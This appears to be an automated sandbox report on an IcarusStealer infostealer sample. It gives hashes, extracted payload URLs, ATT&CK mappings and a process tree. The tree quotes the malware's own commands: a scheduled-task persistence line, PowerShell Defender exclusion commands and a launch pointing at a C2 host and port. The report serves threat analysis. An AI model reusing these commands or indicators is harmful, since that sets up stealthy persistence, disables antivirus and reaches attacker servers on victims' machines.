icarusstealer | 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
85s
max time network
80s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09/03/2024, 09:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom1.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 6 IoCs

pid	Process
2104	Client.exe
1816	switched.exe
2664	pulse x loader.exe
2836	tesetey.exe
2812	RuntimeBroker.exe
916	$SXR.exe

Loads dropped DLL 6 IoCs

pid	Process
2952	custom1.exe
2952	custom1.exe
1816	switched.exe
1816	switched.exe
2608	cmd.exe
356	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
14	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\CatRoot\$SXR\Read.txt	Client.exe
File created	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\Read.txt	$SXR.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2836 set thread context of 1940	2836	tesetey.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
612	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1352	timeout.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tesetey.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tesetey.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2836	tesetey.exe
2812	RuntimeBroker.exe
2296	powershell.exe
2968	powershell.exe
2104	Client.exe
2104	Client.exe
2104	Client.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe
2812	RuntimeBroker.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	2836	tesetey.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeDebugPrivilege	1940	cvtres.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeDebugPrivilege	2812	RuntimeBroker.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2104	Client.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeShutdownPrivilege	1800	explorer.exe
Token: SeDebugPrivilege	916	$SXR.exe
Token: SeDebugPrivilege	916	$SXR.exe
Token: SeShutdownPrivilege	1800	explorer.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe

Suspicious use of SendNotifyMessage 18 IoCs

pid	Process
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe
1800	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2952 wrote to memory of 2104	2952	custom1.exe	28
PID 2952 wrote to memory of 2104	2952	custom1.exe	28
PID 2952 wrote to memory of 2104	2952	custom1.exe	28
PID 2952 wrote to memory of 2104	2952	custom1.exe	28
PID 2952 wrote to memory of 1816	2952	custom1.exe	29
PID 2952 wrote to memory of 1816	2952	custom1.exe	29
PID 2952 wrote to memory of 1816	2952	custom1.exe	29
PID 2952 wrote to memory of 1816	2952	custom1.exe	29
PID 1816 wrote to memory of 2664	1816	switched.exe	30
PID 1816 wrote to memory of 2664	1816	switched.exe	30
PID 1816 wrote to memory of 2664	1816	switched.exe	30
PID 1816 wrote to memory of 2664	1816	switched.exe	30
PID 1816 wrote to memory of 2836	1816	switched.exe	31
PID 1816 wrote to memory of 2836	1816	switched.exe	31
PID 1816 wrote to memory of 2836	1816	switched.exe	31
PID 1816 wrote to memory of 2836	1816	switched.exe	31
PID 2664 wrote to memory of 2548	2664	pulse x loader.exe	33
PID 2664 wrote to memory of 2548	2664	pulse x loader.exe	33
PID 2664 wrote to memory of 2548	2664	pulse x loader.exe	33
PID 2548 wrote to memory of 2768	2548	cmd.exe	35
PID 2548 wrote to memory of 2768	2548	cmd.exe	35
PID 2548 wrote to memory of 2768	2548	cmd.exe	35
PID 2548 wrote to memory of 2520	2548	cmd.exe	36
PID 2548 wrote to memory of 2520	2548	cmd.exe	36
PID 2548 wrote to memory of 2520	2548	cmd.exe	36
PID 2548 wrote to memory of 2960	2548	cmd.exe	37
PID 2548 wrote to memory of 2960	2548	cmd.exe	37
PID 2548 wrote to memory of 2960	2548	cmd.exe	37
PID 2836 wrote to memory of 2444	2836	tesetey.exe	38
PID 2836 wrote to memory of 2444	2836	tesetey.exe	38
PID 2836 wrote to memory of 2444	2836	tesetey.exe	38
PID 2836 wrote to memory of 2444	2836	tesetey.exe	38
PID 2444 wrote to memory of 2964	2444	csc.exe	39
PID 2444 wrote to memory of 2964	2444	csc.exe	39
PID 2444 wrote to memory of 2964	2444	csc.exe	39
PID 2444 wrote to memory of 2964	2444	csc.exe	39
PID 2836 wrote to memory of 1800	2836	tesetey.exe	40
PID 2836 wrote to memory of 1800	2836	tesetey.exe	40
PID 2836 wrote to memory of 1800	2836	tesetey.exe	40
PID 2836 wrote to memory of 1800	2836	tesetey.exe	40
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2836 wrote to memory of 2608	2836	tesetey.exe	42
PID 2836 wrote to memory of 2608	2836	tesetey.exe	42
PID 2836 wrote to memory of 2608	2836	tesetey.exe	42
PID 2836 wrote to memory of 2608	2836	tesetey.exe	42
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2836 wrote to memory of 1940	2836	tesetey.exe	41
PID 2608 wrote to memory of 2812	2608	cmd.exe	44
PID 2608 wrote to memory of 2812	2608	cmd.exe	44
PID 2608 wrote to memory of 2812	2608	cmd.exe	44
PID 2608 wrote to memory of 2812	2608	cmd.exe	44
PID 1800 wrote to memory of 1988	1800	explorer.exe	45
PID 1800 wrote to memory of 1988	1800	explorer.exe	45
PID 1800 wrote to memory of 1988	1800	explorer.exe	45
PID 1940 wrote to memory of 600	1940	cvtres.exe	46
PID 1940 wrote to memory of 600	1940	cvtres.exe	46
PID 1940 wrote to memory of 600	1940	cvtres.exe	46
PID 1940 wrote to memory of 600	1940	cvtres.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2952
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
    3⤵
    PID:836
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
      4⤵
      Creates scheduled task(s)
      PID:612
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A97.tmp.bat""
    3⤵
    - Loads dropped DLL
    PID:356
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1352
  - - C:\Windows\System32\CatRoot\$SXR\$SXR.exe
      "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:916
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2548
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:2768
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:2520
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:2960
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jtzagf3c\jtzagf3c.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2444
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39B6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7C576929BC544C378385B5D37F5CDC1.TMP"
        5⤵
        
        PID:2964
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1800
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:1988
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        5⤵
        
        PID:600
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        5⤵
        
        PID:2208
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe & exit
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2608
    - - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab6CD9.tmp

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
10.1MB

MD5
27e4a8dd5bafdf2db044b899d5054854

SHA1
5cd13eb3fd787b20b8d2fa76db824a9f8f1576ed

SHA256
c38dbd63bcaf7b6792b34b764ba41d96684050926166ab7e07c5f73551eb349f

SHA512
6d183fb1061537c2d3d81a2fba602457dbc3c35d29c335e97b201cfc819b2144bbf538a20d54f0d6e1666335617aeb888997c25f7a24d07c02bcbd61f1ba0f08

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES39B6.tmp

Filesize
1KB

MD5
e3f5eff15a6d019f24199eb59a5f4507

SHA1
50520905e2ee6942877325bd094501000131de62

SHA256
d530dec1cd765b2f9b93e1e97381dd1104d374e247c766d30a14f7fc2790ed5c

SHA512
0b530d15e622349cf99bdd2ba6ce802dcd460d6a83a61c75d54d9314e2482c54800a489bd6c43d0e39acd25849f6cf43c4f915d0d9103dc39adaf5854f01a7aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
2.1MB

MD5
d6b7c22d63d968bbdcc8aef039e05763

SHA1
3416f97b85334c4de6f4893472997715b28a08fa

SHA256
68e9e1b5290f496213817ba012fdc08e53194de56207a757d4569b5eda53710b

SHA512
eb0262a55973e9ea4fbc6eda3bca320db34b68000e79ea2f96971d158b5e93957cb355b7a745deb83a5b8f9ee0a9fa84e4246a39a61be055930c6f7af89c39e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
2.8MB

MD5
0731c4cb06802ce1c8654cf575c0a275

SHA1
623d24a9a8a10e32202a3f157223966b15379bbe

SHA256
fba7e5480fa13c4df3654a5c66509b6b51a1029bf95dd92e8b7de6f708b68866

SHA512
ccd5b8e2b985f07871575344b4a9cad49eda283043b690579477f6af0da3c37bec1cbb3ba13e45e5e40832a72c529354d9be73ee69341c28218479fb4d65086a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4A97.tmp.bat

Filesize
150B

MD5
fdf39570350a562f37c37e9cf86bcb6d

SHA1
0b0e338a1dbb0cfd57bb82af04828f794febf674

SHA256
f3f9eb2d784108644bfd1cee7919549bde0970dfecd099b27d58023ee3e07138

SHA512
381e14f26affbe0fe865b8baf4a49224905f85c04f17778c0403881d12f978685757a7943b6495b6f2d5ebdd8d193b2694f12f94857f0d0e8ec86a38a32da2c7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\475A77L9LKKHTQDDIXKD.temp

Filesize
7KB

MD5
45a0e40f56e720fb1a92b00c360d9af8

SHA1
513898d95070ba5f0c9ca5ea791c74bb9d1c9b41

SHA256
0bcd9543b00146e7a339228f4e2a256c855d62b27cfe354e16ca733db2c11999

SHA512
9b97cbc3604358eb0de6acf58118e221cc678dac399660b3c4c3cc42e9f9e4d3b8611f41727d4ecca70276667a71a2a1b3446c794ac46ea31f560735b58ba5a5

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
6.7MB

MD5
b7450fbac82b11bd97f2cac20d41f9e4

SHA1
e586a7078b4be22b6783b8171ebd810ea031c1ba

SHA256
02192e27d1c215621294f307f3e349e9d6247b347f74ba22357f2840c1e171f3

SHA512
3a9e1844cf55b4fe6b81ab50df5ba5e41225ffa1847d096c514a08a7fdf3fbda8374207368326e2642ed1e98db240a0592d2cd382cc97e365a880a4734bcb005

Download Submit
C:\Windows\System32\CatRoot\$SXR\Read.txt

Filesize
58B

MD5
79668a6729f0f219835c62c9e43b7927

SHA1
0cbbc7cc8dbd27923b18285960640f3dad96d146

SHA256
6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

SHA512
bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
9.2MB

MD5
d71d46ceaa10ef71d9d274dbdb1d5ec1

SHA1
44cd39fc1def63ab7183a2e4cb1a2ea4667ffad8

SHA256
c0d54d7f6a7474f005f61f27c6d59dd0f7b731ca51c746f0643119c596e86516

SHA512
877e2b629434b354795e6eb08eb5c281950e8e20341ad3d18d58985504a5b642f3405266c0118d10875c4fb6ea18e77d8da8dd2c2ed7875e47dbcf25bb8a621e

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
1.8MB

MD5
4ac2ac348d86c9c79edda4ff78db7ca6

SHA1
ccfc7829fbe550943442800be506a02979d07947

SHA256
16296efa547c3f120a27b0eafedd56848023cf626f27e873e47a1481ab2feb37

SHA512
b9b79bd4cdb3278db74607a6ce955e6320bb9908c3c1ace9b005afbd06dfc3246f8f4f3715ee8f8c6408e3e82481c4a97c09f15afa453e5fc2ec82cabc02c1ee

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7C576929BC544C378385B5D37F5CDC1.TMP

Filesize
1KB

MD5
8cb2d1f69e2730b5de634f6b6c12005f

SHA1
1f9496195f09f58a4e382994717a5da34086d770

SHA256
f5d616663ac61dc843c8663f2ceaaf6939b974ffd74e6e1be232b3fe8c6667ea

SHA512
d035c16a8d8f09abedc94e10d46983e371d2862b277128fe00184d3a1cbb8a69367c08e150c63b07729938bea6644af4e3913e629969d38978b0d934e9e61eda

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jtzagf3c\jtzagf3c.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jtzagf3c\jtzagf3c.cmdline

Filesize
455B

MD5
5abeab481585f52d3798cf9c34a6b4ad

SHA1
b6994dda0841c535adb5f6cba0ac4f96c8df1159

SHA256
4f2c19d03c38329ce4978ae9617f19bccd84ecbe66035caed42ea85bd99f107a

SHA512
cea6fd4b944b4fb5a196e15242e8e9e488853e1132e0815b909b77be388ecff313e1aa563cc69a286e337390c4e93b4955f047fbb2025ea7457410c3c4213e82

Download Submit
\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
640KB

MD5
24d1fc20d9be37ebdb2e28f5a9ea5231

SHA1
e9fb985958daa541aa2a85d04f1d431ddabea2cd

SHA256
89ba02cd96b0cb075918c87d9a062d5a66e2a061c0408786de0fa5c9d0147efa

SHA512
617a6305f65a1979d963ae5f0445bec6783fb572a4287c88e4e5ff4e32f48134220253ffb7fb71cf67b2269f14e0785a70e418d31ce4670ba5aff92f3f73fc1f

Download Submit
\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe

Filesize
4KB

MD5
b8463bfe87a308d78eeadf45d4157cfe

SHA1
f677f3039a2ae1e57248a0c6a8aff369550b30b7

SHA256
b5dca84981080cf9f13e6939319a25c7406dfc08e65ad194f1d834354d6dd756

SHA512
58a7eb083ca10e407d79f525d111a64d34c2a7d0886f34842a2d068953d5bdcf26dfc59113811c5cacdb3beebf91895f94dd9f493b0b0c763cc3570f0f2a6047

Download Submit
\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
3.1MB

MD5
b1d3b6f7673bd8572d9519468a6a2d6c

SHA1
61b907e4abdf29b77c5da751150f4172163f0a04

SHA256
e78cbf2e8d31f6140a7e7afdadd6d96a6c5475fd9149c7b920edfb8b889b42a9

SHA512
